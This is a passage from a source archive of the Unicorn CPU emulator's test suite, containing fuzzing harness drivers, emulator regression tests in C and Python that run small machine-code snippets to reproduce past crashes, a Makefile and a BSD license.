's/UC_ARCH_X86/UC_ARCH_ARM64/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_ARM + UC_MODE_BIG_ENDIAN/' > fuzz_emu_arm64_armbe.c sed 's/UC_ARCH_X86/UC_ARCH_ARM/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_ARM/' > fuzz_emu_arm_arm.c sed 's/UC_ARCH_X86/UC_ARCH_ARM/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_THUMB/' > fuzz_emu_arm_thumb.c sed 's/UC_ARCH_X86/UC_ARCH_ARM/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_ARM + UC_MODE_BIG_ENDIAN/' > fuzz_emu_arm_armbe.c #sed 's/UC_ARCH_X86/UC_ARCH_ARM/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_THUMB + UC_MODE_BIG_ENDIAN/' > fuzz_emu_arm_thumbbe.c sed 's/UC_ARCH_X86/UC_ARCH_S390X/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_BIG_ENDIAN/' > fuzz_emu_s390x_be.c���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/onedir.c�������������������������������������������������������������������0000664�0000000�0000000�00000003317�14675241067�0016774�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <stdint.h> #include <stdlib.h> #include <stdio.h> #include <dirent.h> #include <unistd.h> int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size); int main(int argc, char** argv) { FILE * fp; uint8_t Data[0x1000]; size_t Size; DIR *d; struct dirent *dir; int r = 0; if (argc != 2) { return 1; } d = opendir(argv[1]); if (d == NULL) { printf("Invalid directory\n"); return 2; } if (chdir(argv[1]) != 0) { closedir(d); printf("Invalid directory\n"); return 2; } printf("Starting directory %s\n", argv[1]); while((dir = readdir(d)) != NULL) { //opens the file, get its size, and reads it into a buffer if (dir->d_type != DT_REG) { continue; } //printf("Running file %s\n", dir->d_name); fflush(stdout); fp = fopen(dir->d_name, "rb"); if (fp == NULL) { r = 3; break; } if (fseek(fp, 0L, SEEK_END) != 0) { fclose(fp); r = 4; break; } Size = ftell(fp); if (Size == (size_t) -1) { fclose(fp); r = 5; break; } else if (Size > 0x1000) { fclose(fp); continue; } if (fseek(fp, 0L, SEEK_SET) != 0) { fclose(fp); r = 7; break; } if (fread(Data, Size, 1, fp) != 1) { fclose(fp); r = 8; break; } //lauch fuzzer LLVMFuzzerTestOneInput(Data, Size); fclose(fp); } closedir(d); printf("Ok : whole directory finished %s\n", argv[1]); return r; } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/onefile.c������������������������������������������������������������������0000664�0000000�0000000�00000001642�14675241067�0017134�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <stdint.h> #include <stdlib.h> #include <stdio.h> int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size); int main(int argc, char** argv) { FILE * fp; uint8_t *Data; size_t Size; if (argc != 2) { return 1; } //opens the file, get its size, and reads it into a buffer fp = fopen(argv[1], "rb"); if (fp == NULL) { return 2; } if (fseek(fp, 0L, SEEK_END) != 0) { fclose(fp); return 2; } Size = ftell(fp); if (Size == (size_t) -1) { fclose(fp); return 2; } if (fseek(fp, 0L, SEEK_SET) != 0) { fclose(fp); return 2; } Data = malloc(Size); if (Data == NULL) { fclose(fp); return 2; } if (fread(Data, Size, 1, fp) != 1) { fclose(fp); return 2; } //lauch fuzzer LLVMFuzzerTestOneInput(Data, Size); fclose(fp); return 0; } ����������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016020�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/.gitignore��������������������������������������������������������������0000664�0000000�0000000�00000001430�14675241067�0020006�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������!*.c arm_enable_vfp map_crash sigill sigill2 block_test map_write ro_mem_test nr_mem_test timeout_segfault rep_movsb mips_kseg0_1 eflags_nosync 00opcode_uc_crash eflags_noset invalid_read_in_cpu_tb_exec invalid_write_in_cpu_tb_exec_x86_64 x86_16_segfault mips_invalid_read_of_size_4_when_tracing invalid_read_in_tb_flush_x86_64 sparc_jump_to_zero mips_delay_slot_code_hook threaded_emu_start emu_stop_in_hook_overrun mips_branch_likely_issue emu_clear_errors 001-bad_condition_code_0xe 002-qemu__fatal__unimplemented_control_register_write_0xffb___0x0 003-qemu__fatal__wdebug_not_implemented 004-segmentation_fault_1 005-qemu__fatal__illegal_instruction__0000___00000404 006-qemu__fatal__illegal_instruction__0421___00040026 rw_hookstack hook_extrainvoke sysenter_hook_x86 memleak_* mem_* ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/001-bad_condition_code_0xe.c��������������������������������������������0000664�0000000�0000000�00000002215�14675241067�0023024�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #define HARDWARE_ARCHITECTURE UC_ARCH_ARM #define HARDWARE_MODE 16 #define MEMORY_STARTING_ADDRESS 8192 #define MEMORY_SIZE 4096 #define MEMORY_PERMISSIONS 6 #define BINARY_CODE "\x56\xe8\x46\x46\x80\xf6\x8c\x56\xff\xbf\xcd\x90\xda\xa0\xed\xe8\x46\x43\x45\xe5\x80\x90\x44\x46\x04" static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf("hook_code(…) called\n"); } int main(int argc, char **argv, char **envp) { uc_engine *uc; if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { printf("uc_open(…) failed\n"); return 1; } uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { printf("uc_mem_write(…) failed\n"); return 1; } uc_hook trace; uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); printf("uc_emu_start(…)\n"); uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); printf("done\n"); return 0; } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/002-qemu__fatal__unimplemented_control_register_write_0xffb___0x0.c�����0000664�0000000�0000000�00000002140�14675241067�0032752�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #define HARDWARE_ARCHITECTURE UC_ARCH_M68K #define HARDWARE_MODE 1073741824 #define MEMORY_STARTING_ADDRESS 8388608 #define MEMORY_SIZE 2097152 #define MEMORY_PERMISSIONS 7 #define BINARY_CODE "\xaf\x80\x4e\x7b\xff\xfb\x80\x4e\x3e\x80" static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf("hook_code(…) called\n"); } int main(int argc, char **argv, char **envp) { uc_engine *uc; if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { printf("uc_open(…) failed\n"); return 1; } uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { printf("uc_mem_write(…) failed\n"); return 1; } uc_hook trace; uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); printf("uc_emu_start(…)\n"); uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); printf("done\n"); return 0; } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/003-qemu__fatal__wdebug_not_implemented.c�������������������������������0000664�0000000�0000000�00000002117�14675241067�0025701�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #define HARDWARE_ARCHITECTURE UC_ARCH_M68K #define HARDWARE_MODE 1073741824 #define MEMORY_STARTING_ADDRESS 1048576 #define MEMORY_SIZE 403456 #define MEMORY_PERMISSIONS 7 #define BINARY_CODE "\x42\xc7\xfb\xfb\x54\x36" static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf("hook_code(…) called\n"); } int main(int argc, char **argv, char **envp) { uc_engine *uc; if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { printf("uc_open(…) failed\n"); return 1; } uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { printf("uc_mem_write(…) failed\n"); return 1; } uc_hook trace; uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); printf("uc_emu_start(…)\n"); uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); printf("done\n"); return 0; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/004-segmentation_fault_1.c����������������������������������������������0000664�0000000�0000000�00000002134�14675241067�0022575�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #define HARDWARE_ARCHITECTURE UC_ARCH_ARM #define HARDWARE_MODE 16 #define MEMORY_STARTING_ADDRESS 1024 #define MEMORY_SIZE 1796096 #define MEMORY_PERMISSIONS 7 #define BINARY_CODE "\x20\xbf\xbf\xbf\xbf\xdd\x5d\x74\x5e\x66\x72\x10" static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf("hook_code(…) called\n"); } int main(int argc, char **argv, char **envp) { uc_engine *uc; if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { printf("uc_open(…) failed\n"); return 1; } uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { printf("uc_mem_write(…) failed\n"); return 1; } uc_hook trace; uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); printf("uc_emu_start(…)\n"); uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); printf("done\n"); return 0; } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/005-qemu__fatal__illegal_instruction__0000___00000404.c�����������������0000664�0000000�0000000�00000002075�14675241067�0027303�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #define HARDWARE_ARCHITECTURE UC_ARCH_M68K #define HARDWARE_MODE 1073741824 #define MEMORY_STARTING_ADDRESS 1024 #define MEMORY_SIZE 1044480 #define MEMORY_PERMISSIONS 5 #define BINARY_CODE "\x4c\x4c" static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf("hook_code(…) called\n"); } int main(int argc, char **argv, char **envp) { uc_engine *uc; if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { printf("uc_open(…) failed\n"); return 1; } uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { printf("uc_mem_write(…) failed\n"); return 1; } uc_hook trace; uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); printf("uc_emu_start(…)\n"); uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); printf("done\n"); return 0; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/006-qemu__fatal__illegal_instruction__0421___00040026.c�����������������0000664�0000000�0000000�00000002462�14675241067�0027317�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #define HARDWARE_ARCHITECTURE UC_ARCH_M68K #define HARDWARE_MODE 1073741824 #define MEMORY_STARTING_ADDRESS 262144 #define MEMORY_SIZE 403456 #define MEMORY_PERMISSIONS 7 #define BINARY_CODE "\xe2\x86\x09\xbc\xf2\x17\x09\xca\xca\xca\xca\x09\x09\x09\xf2\x17\x09\x20\x09\x09\xf2\x08\x09\x03\x09\xca\x6b\x6b\x6b\x1e\xca\xca\x86\x09\x09\xf2\x17\x09\x04\x21\x09\x09\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf2" static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf("hook_code(…) called\n"); } int main(int argc, char **argv, char **envp) { uc_engine *uc; if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { printf("uc_open(…) failed\n"); return 1; } uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { printf("uc_mem_write(…) failed\n"); return 1; } uc_hook trace; uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); printf("uc_emu_start(…)\n"); uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); printf("done\n"); return 0; } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/00opcode_uc_crash.c�����������������������������������������������������0000664�0000000�0000000�00000003306�14675241067�0021446�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <stdlib.h> #include <stdio.h> #include <assert.h> #include <unicorn/unicorn.h> #define X86_CODE32 "\x00" // add byte ptr ds:[eax],al #define ADDRESS 0x1000000 static void VM_exec(void) { uc_engine *uc; uc_err err; uint32_t tmp; unsigned int r_eax; r_eax = 0x1000008; // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if(err) { printf("Failed on uc_open() with error returned: %s\n", uc_strerror(err)); return; } err = uc_mem_map(uc, ADDRESS, (4 * 1024 * 1024), UC_PROT_ALL); if(err != UC_ERR_OK) { printf("Failed to map memory %s\n", uc_strerror(err)); return; } // write machine code to be emulated to memory err = uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1); if(err != UC_ERR_OK) { printf("Failed to write emulation code to memory, quit!: %s(len %zu)\n", uc_strerror(err), sizeof(X86_CODE32) - 1); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); // emulate machine code in infinite time err = uc_emu_start(uc, ADDRESS, ADDRESS + (sizeof(X86_CODE32) - 1), 0, 0); if(err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); uc_close(uc); return; } if (!uc_mem_read(uc, ADDRESS+8, &tmp, sizeof(tmp))) printf(">>> Read 4 bytes from [0x%08X] = 0x%08X\n", ADDRESS+8, tmp); //should contain the byte '8' else printf(">>> Failed to read 4 bytes from [0x%08X]\n", ADDRESS+8); uc_close(uc); puts("No crash. Yay!"); } int main(int argc, char *argv[]) { VM_exec(); return 0; } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/LICENSE�����������������������������������������������������������������0000664�0000000�0000000�00000003230�14675241067�0017023�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������This is the software license for Unicorn regression tests. The regression tests are written by several Unicorn contributors (See CREDITS.TXT) and maintained by Hoang-Vu Dang <dang.hvu@gmail.com> Copyright (c) 2015, Unicorn contributors All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the developer(s) nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/Makefile����������������������������������������������������������������0000664�0000000�0000000�00000000653�14675241067�0017464�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������CFLAGS += -Wall -Werror -I../../include CFLAGS += -D__USE_MINGW_ANSI_STDIO=1 LDLIBS += -L../../ -lm -lunicorn UNAME_S := $(shell uname -s) LDLIBS += -pthread ifeq ($(UNAME_S), Linux) LDLIBS += -lrt endif EXECUTE_VARS = LD_LIBRARY_PATH=../../cmocka/src:../../ DYLD_LIBRARY_PATH=../../ TESTS_SOURCE = $(wildcard *.c) TESTS = $(TESTS_SOURCE:%.c=%) .PHONY: all clean test test: $(TESTS) all: $(TESTS) clean: rm -f $(TESTS) �������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/arm64_reg_rw_w0_w30.py��������������������������������������������������0000664�0000000�0000000�00000001667�14675241067�0022001�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.arm64_const import * from unicorn.x86_const import * import regress class Arm64RegReadWriteW0ThroughW30(regress.RegressTest): """ Testing the functionality to read/write 32-bit registers in AArch64 See issue #716 """ def runTest(self): uc = Uc(UC_ARCH_ARM64, UC_MODE_ARM) uc.reg_write(UC_ARM64_REG_X0, 0x1234567890abcdef) self.assertEquals(uc.reg_read(UC_ARM64_REG_X0), 0x1234567890abcdef) self.assertEquals(uc.reg_read(UC_ARM64_REG_W0), 0x90abcdef) uc.reg_write(UC_ARM64_REG_X30, 0xa1b2c3d4e5f6a7b8) self.assertEquals(uc.reg_read(UC_ARM64_REG_W30), 0xe5f6a7b8) uc.reg_write(UC_ARM64_REG_W30, 0xaabbccdd) self.assertEquals(uc.reg_read(UC_ARM64_REG_X30), 0xa1b2c3d4aabbccdd) self.assertEquals(uc.reg_read(UC_ARM64_REG_W30), 0xaabbccdd) if __name__ == '__main__': regress.main() �������������������������������������������������������������������������unicorn-2.1.1/tests/regress/arm_bx_unmapped.py������������������������������������������������������0000664�0000000�0000000�00000005767�14675241067�0021552�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from __future__ import print_function from unicorn import * from unicorn.arm_const import * import regress # code to be emulated ''' ins = { 0x00008cd4: """ push {r11} add r11, sp, #0 mov r3, pc mov r0, r3 sub sp, r11, #0 pop {r11} bx lr """, 0x00008cf0: """ push {r11} add r11, sp, #0 push {r6} add r6, pc, $1 bx r6 .code 16 mov r3, pc add r3, $0x4 push {r3} pop {pc} .code 32 pop {r6} mov r0, r3 sub sp, r11, #0 pop {r11} bx lr """, 0x00008d20: """ push {r11} add r11, sp, #0 mov r3, lr mov r0, r3 sub sp, r11, #0 pop {r11} bx lr """, 0x00008d68: "bl 0x8cd4\n" "mov r4, r0\n" "bl 0x8cf0\n" "mov r3, r0\n" "add r4, r4, r3\n" "bl 0x8d20\n" "mov r3, r0\n" "add r2, r4, r3", } ''' class BxTwiceTest(regress.RegressTest): def runTest(self): ADDRESS = 0x8000 MAIN_ADDRESS = 0x8d68 STACK_ADDR = ADDRESS + 0x1000 code = { 0x8cf0: '\x04\xb0-\xe5\x00\xb0\x8d\xe2\x04`-\xe5\x01`\x8f\xe2\x16\xff/\xe1{F\x03\xf1\x04\x03\x08\xb4\x00\xbd\x00\x00\x04`\x9d\xe4\x03\x00\xa0\xe1\x00\xd0K\xe2\x04\xb0\x9d\xe4\x1e\xff/\xe1', 0x8d20: '\x04\xb0-\xe5\x00\xb0\x8d\xe2\x0e0\xa0\xe1\x03\x00\xa0\xe1\x00\xd0K\xe2\x04\xb0\x9d\xe4\x1e\xff/\xe1', 0x8cd4: '\x04\xb0-\xe5\x00\xb0\x8d\xe2\x0f0\xa0\xe1\x03\x00\xa0\xe1\x00\xd0K\xe2\x04\xb0\x9d\xe4\x1e\xff/\xe1', 0x8d68: '\xd9\xff\xff\xeb\x00@\xa0\xe1\xde\xff\xff\xeb\x000\xa0\xe1\x03@\x84\xe0\xe7\xff\xff\xeb\x000\xa0\xe1\x03 \x84\xe0' } try: mu = Uc(UC_ARCH_ARM, UC_MODE_ARM) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory for addr, c in code.items(): print("Writing chunk to 0x{:x}".format(addr)) mu.mem_write(addr, c) # initialize machine registers mu.reg_write(UC_ARM_REG_SP, STACK_ADDR) print("Starting emulation") # emulate code in infinite time & unlimited instructions mu.emu_start(MAIN_ADDRESS, MAIN_ADDRESS + len(code[MAIN_ADDRESS])) print("Emulation done") r2 = mu.reg_read(UC_ARM_REG_R2) print(">>> r2: 0x{:08x}".format(r2)) except UcError as e: self.fail("ERROR: %s" % e) ���������unicorn-2.1.1/tests/regress/arm_bxeq_hang.py��������������������������������������������������������0000775�0000000�0000000�00000001301�14675241067�0021163�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.arm_const import * import regress class BxHang(regress.RegressTest): def runTest(self): uc = Uc(UC_ARCH_ARM, UC_MODE_ARM) uc.mem_map(0x1000, 0x1000) uc.mem_write(0x1000, '1eff2f010000a0e1'.decode('hex')) # bxeq lr; mov r0, r0 uc.count = 0 def hook_block(uc, addr, *args): print 'enter block 0x%04x' % addr uc.count += 1 uc.reg_write(UC_ARM_REG_LR, 0x1004) uc.hook_add(UC_HOOK_BLOCK, hook_block) print 'block should only run once' uc.emu_start(0x1000, 0x1004) self.assertEqual(uc.count, 1) if __name__ == '__main__': regress.main() �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/arm_enable_vfp.c��������������������������������������������������������0000664�0000000�0000000�00000002527�14675241067�0021132�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #include <stdio.h> #include <string.h> #include <stdlib.h> #define ADDRESS 0x1000 #define ARM_VMOV "\xC0\xEF\x10\x00" // VMOV.I32 D16, #0 ; Vector Move int main(void) { uc_engine *uc; uc_err err; err = uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc); if (err) { printf("uc_open %d\n", err); return 1; } uint64_t tmp_val; err = uc_reg_read(uc, UC_ARM_REG_C1_C0_2, &tmp_val); if (err) { printf("uc_open %d\n", err); return 1; } tmp_val = tmp_val | (0xf << 20); err = uc_reg_write(uc, UC_ARM_REG_C1_C0_2, &tmp_val); if (err) { printf("uc_open %d\n", err); return 1; } size_t enable_vfp = 0x40000000; err = uc_reg_write(uc, UC_ARM_REG_FPEXC, &enable_vfp); if (err) { printf("uc_open %d\n", err); return 1; } err = uc_mem_map(uc, ADDRESS, 4 * 1024, UC_PROT_ALL); if (err) { printf("uc_mem_map %d\n", err); return 1; } err = uc_mem_write(uc, ADDRESS, ARM_VMOV, sizeof(ARM_VMOV) - 1); if (err) { printf("uc_mem_map %s\n", uc_strerror(err)); return 1; } err = uc_emu_start(uc, ADDRESS, 0, 0, 1); if (err) { printf("uc_emu_start: %s\n", uc_strerror(err)); return 1; } printf("Success\n"); uc_close(uc); return 0; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/arm_fp_vfp_disabled.py��������������������������������������������������0000775�0000000�0000000�00000002256�14675241067�0022350�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python # coding=utf8 # Added by Peter Mackay, relating to issue 571 # "ARM NEON/VFP support seems to exist but is disabled by default" # https://github.com/unicorn-engine/unicorn/issues/571 from unicorn import * from unicorn.arm_const import * import regress class FpVfpDisabled(regress.RegressTest): def runTest(self): # MRC p15, #0, r1, c1, c0, #2 # ORR r1, r1, #(0xf << 20) # MCR p15, #0, r1, c1, c0, #2 # MOV r1, #0 # MCR p15, #0, r1, c7, c5, #4 # MOV r0,#0x40000000 # FMXR FPEXC, r0 code = '11EE501F' code += '41F47001' code += '01EE501F' code += '4FF00001' code += '07EE951F' code += '4FF08040' code += 'E8EE100A' # vpush {d8} code += '2ded028b' address = 0x1000 mem_size = 0x1000 code_bytes = code.decode('hex') uc = Uc(UC_ARCH_ARM, UC_MODE_THUMB) uc.mem_map(address, mem_size) uc.mem_write(address, code_bytes) uc.reg_write(UC_ARM_REG_SP, address + mem_size) uc.emu_start(address + 1, address + len(code_bytes)) if __name__ == '__main__': regress.main() ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/arm_init_input_crash.py�������������������������������������������������0000775�0000000�0000000�00000006117�14675241067�0022603�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # Sample code for ARM of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> # Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com> # from __future__ import print_function from unicorn import * from unicorn.arm_const import * # code to be emulated ARM_CODE = "\x37\x00\xa0\xe3\x03\x10\x42\xe0" # mov r0, #0x37; sub r1, r2, r3 THUMB_CODE = "\x83\xb0" # sub sp, #0xc # memory address where emulation starts ADDRESS = 0xF0000000 # callback for tracing basic blocks def hook_block(uc, address, size, user_data): print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) # callback for tracing instructions def hook_code(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = %u" %(address, size)) # Test ARM def test_arm(): print("Emulate ARM code") try: # Initialize emulator in ARM mode mu = 